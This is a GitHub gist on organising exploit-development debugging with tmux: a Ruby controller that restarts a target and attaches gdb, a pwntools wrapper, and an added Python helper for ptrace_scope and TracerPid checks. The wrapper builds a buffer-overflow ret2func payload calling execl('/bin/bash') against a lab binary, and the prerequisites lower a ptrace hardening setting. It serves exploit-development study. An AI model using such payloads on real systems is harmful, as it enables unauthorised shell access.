@huyphan
Last active March 20, 2017 21:49
Organizing exploit development and debugging process with Tmux

Idea

  • Have a single script that automatically runs the binary, attaches gdb and re-sets the breakpoints every time you restart a debugging session.
  • The main idea is to run the debugging processes (the target and gdb) in different tmux panes and let a controller script, running in yet another tmux pane, send keystrokes to those panes to automate the activity in them.

Prerequisites

  • tmux
  • If you run gdb as a non-root user, the Yama setting /proc/sys/kernel/yama/ptrace_scope must be 0 (as root: echo 0 > /proc/sys/kernel/yama/ptrace_scope, or sysctl -w kernel.yama.ptrace_scope=0); otherwise gdb cannot attach to a process it did not spawn itself and fails with "ptrace: Operation not permitted". This relaxes a system-wide hardening setting (any of your processes can then ptrace any other process with the same uid), so do it in a throwaway VM; the value written this way does not persist across reboots.

Usage

  • Use the controller.rb script as a template to orchestrate your debug/exploit development process. You must execute it inside the same tmux session that contains the panes where the runner and gdb will live, because it addresses those panes by window and pane index.
  • Update the CONFIGURATIONS section of the script to match your setup:
    • RUNNER: either the path to the binary being debugged or a wrapper script that launches it (see the wrapper.py example below).
    • BINARY_NAME: name of the binary being debugged; it is passed to pgrep -x to find the exact PID of the running process, so it must match the process name of the target, not of the wrapper.
    • RUNNER_TMUX_PANE and GDB_TMUX_PANE: the identities of the tmux panes (in the format <window_index>.<pane_index>) used for running the binary and gdb respectively. In the current setup they are the first panes of the first two tmux windows. You are free to organize the panes your own way (e.g. two panes split vertically in the same window) and update these values accordingly.
    • GDB_STARTUP_COMMANDS: the commands to run after gdb has attached, one per line (typically breakpoints followed by c to continue the stopped target).
controller.rb

#! /usr/bin/env ruby
#### CONFIGURATIONS ####
RUNNER = "python /home/vagrant/host-share/wrapper.py"
BINARY_NAME = "vuln_binary"
RUNNER_TMUX_PANE = '1.1' # Using pane #1 of tmux's window #1
GDB_TMUX_PANE = '2.1' # Using pane #1 of tmux's window #2
GDB_STARTUP_COMMANDS = '
br *0x0804beef
br *0xdeadeef
c
'
#### END CONFIGURATIONS ####

# Send one line of text to a tmux pane as keystrokes followed by Enter.
# The argument form of system() avoids shell quoting problems with the text.
def send_line(pane, text)
  system('tmux', 'send-keys', '-t', pane, text, 'Enter')
end

# Shell PID of a pane, matched by exact "window.pane" index
# (a grep for '^1.1' would also match panes 1.10, 1.11, ...).
def pane_pid(pane)
  `tmux list-panes -a -F "\#{window_index}.\#{pane_index} \#{pane_pid}"`
    .lines.map(&:split).find { |index, _| index == pane }&.last
end

# Get current window and pane index; refuse to run inside one of the managed panes
current_pane = `tmux display-message -p '#I.#P'`.strip
raise "Current pane (#{current_pane}) is reserved, run this on another pane" if [RUNNER_TMUX_PANE, GDB_TMUX_PANE].include?(current_pane)

# Kill whatever is running on RUNNER_TMUX_PANE and GDB_TMUX_PANE
# (the children of each pane's shell: a previous target, wrapper or gdb)
[RUNNER_TMUX_PANE, GDB_TMUX_PANE].each do |pane|
  pid = pane_pid(pane) or raise "tmux pane #{pane} does not exist"
  system('pkill', '-SIGSTOP', '-P', pid)
  system('pkill', '-SIGKILL', '-P', pid)
end

# Run the executable via the wrapper script and give it a moment to start
send_line(RUNNER_TMUX_PANE, RUNNER)
sleep(1)

# Attach gdb to that process on the GDB pane; exactly one instance must be running
pids = `pgrep -x #{BINARY_NAME}`.split("\n")
raise "Couldn't find process ID to attach" if pids.empty?
raise "There are more than one process IDs" unless pids.length == 1
send_line(GDB_TMUX_PANE, "gdb -p #{pids.first}")
GDB_STARTUP_COMMANDS.split("\n").reject(&:empty?).each { |command| send_line(GDB_TMUX_PANE, command) }
wrapper.py

from pwnlib.tubes.process import process
from pwnlib.util.packing import p32

# Target addresses as given in the gist (32-bit, non-PIE binary, so they are fixed)
execl_addr = 0x080486d0     # address of execl
bin_bash_addr = 0x08049cff  # address of a "/bin/bash" string

# Stack layout after the overflow: 41 bytes of padding up to the saved return
# address, then a ret2func call of execl("/bin/bash", NULL)
payload = b""
payload += b"A" * 41
payload += p32(execl_addr)     # RET -> execl
payload += b"B" * 4            # fake RET (execl does not return on success)
payload += p32(bin_bash_addr)  # path argument
payload += p32(0)              # NULL terminates execl's variadic argument list

p = process("./vuln_binary")
input("Ready?")  # pause so controller.rb can attach gdb before any input reaches the target
print(p.recv(timeout=0.01))
p.sendline(b"1")
print(p.recv(timeout=0.01))
p.sendline(b"2")
# The gist stops here: payload is assembled above but not yet sent.
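Two steps in this setup are left to timing and to a human: the prerequisite above assumes ptrace_scope was lowered (a non-zero value surfaces only as an EPERM from gdb), and the hand-off between wrapper.py's "Ready?" prompt and controller.rb's sleep(1) is a race. The helper below is an added example, not code from huyphan's gist: it reads the Yama value and decides whether `gdb -p` on a process you did not spawn can work, and it replaces the "Ready?" pause with a wait on TracerPid in /proc/<pid>/status, which the kernel sets to the debugger's pid once an attach succeeds. It assumes Linux with /proc mounted; the Yama scope meanings are those documented in the kernel's Yama LSM documentation, and the status text in the docstring is constructed.

```python
"""Attach-readiness helpers for the tmux runner/gdb setup (added example, stdlib only, Linux)."""
import os
import time

YAMA_PATH = "/proc/sys/kernel/yama/ptrace_scope"

# Meaning of each Yama ptrace_scope value (kernel Yama LSM documentation)
YAMA_SCOPES = {
    0: "classic: a process may ptrace any other process with the same uid",
    1: "restricted: only descendants (or PR_SET_PTRACER-declared tracers) may attach",
    2: "admin-only: attaching requires CAP_SYS_PTRACE",
    3: "no attach: PTRACE_ATTACH is disabled for everyone",
}


def read_ptrace_scope(path=YAMA_PATH):
    """Current Yama scope, or None when the kernel has no Yama (plain same-uid rules apply)."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def can_attach_unprivileged(scope, is_root=False):
    """True if `gdb -p <pid>` on a process gdb did not spawn is expected to be allowed."""
    if scope == 3:
        return False            # nobody can attach, not even root
    if is_root:
        return True             # CAP_SYS_PTRACE passes scopes 0, 1 and 2
    return scope == 0           # a separately started gdb is not an ancestor of the target


def parse_tracer_pid(status_text):
    """TracerPid from the text of /proc/<pid>/status; 0 means no debugger is attached.

    Constructed example of the relevant lines:
        Name:\tvuln_binary
        State:\tt (tracing stop)
        TracerPid:\t4242
    """
    for line in status_text.splitlines():
        if line.startswith("TracerPid:"):
            return int(line.split(":", 1)[1].strip())
    raise ValueError("no TracerPid line in status text")


def tracer_pid(pid):
    """TracerPid of a live process, or None if its status file cannot be read."""
    try:
        with open("/proc/%d/status" % pid) as f:
            return parse_tracer_pid(f.read())
    except OSError:
        return None


def wait_for_tracer(pid, timeout=10.0, poll=0.05):
    """Block until a debugger attaches to `pid`.

    Returns the tracer's pid, 0 on timeout, or None if the process vanished
    (or /proc is unavailable) while waiting.
    """
    deadline = time.monotonic() + timeout
    while True:
        t = tracer_pid(pid)
        if t is None or t > 0:
            return t
        if time.monotonic() >= deadline:
            return 0
        time.sleep(poll)


if __name__ == "__main__":
    scope = read_ptrace_scope()
    if scope is None:
        print("Yama not present: same-uid ptrace rules apply")
    else:
        print("ptrace_scope=%d (%s)" % (scope, YAMA_SCOPES.get(scope, "unknown value")))
        if not can_attach_unprivileged(scope, is_root=(os.geteuid() == 0)):
            raise SystemExit("gdb -p would get EPERM; as root: sysctl -w kernel.yama.ptrace_scope=0")
    # In wrapper.py, `wait_for_tracer(p.pid)` takes the place of input("Ready?"):
    # input is only sent once gdb has actually attached to the pwntools-spawned process.
    print("TracerPid of this process:", tracer_pid(os.getpid()))
```

In wrapper.py the hand-off becomes `p = process("./vuln_binary")` followed by `wait_for_tracer(p.pid)`; controller.rb's sleep(1) still has to outlast the wrapper's start-up, but the payload can no longer be delivered before the breakpoints are set. Note that TracerPid is also what anti-debugging code reads, so a target that checks it will see the same value.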